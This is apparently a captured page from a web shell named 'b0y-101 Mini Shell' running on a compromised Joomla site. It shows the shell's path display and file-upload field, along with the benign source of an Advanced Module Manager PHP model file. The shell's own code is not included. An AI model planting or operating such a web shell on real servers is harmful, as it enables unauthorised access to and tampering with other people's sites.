b0y-101 Mini Shell


Current Path : E:/www/buriram/components/com_advancedmodules/models/
File Upload :
Current File : E:/www/buriram/components/com_advancedmodules/models/edit.php

<?php
/**
 * @package         Advanced Module Manager
 * @version         7.11.0
 * 
 * @author          Peter van Westen <info@regularlabs.com>
 * @link            http://www.regularlabs.com
 * @copyright       Copyright © 2019 Regular Labs All Rights Reserved
 * @license         http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
 */

defined('_JEXEC') or die;

require_once JPATH_ADMINISTRATOR . '/components/com_advancedmodules/models/module.php';

class AdvancedModulesModelEdit extends AdvancedModulesModelModule
{
	public function __construct($config = [])
	{
		parent::__construct($config);
	}
}

Copyright © 2019 by b0y-101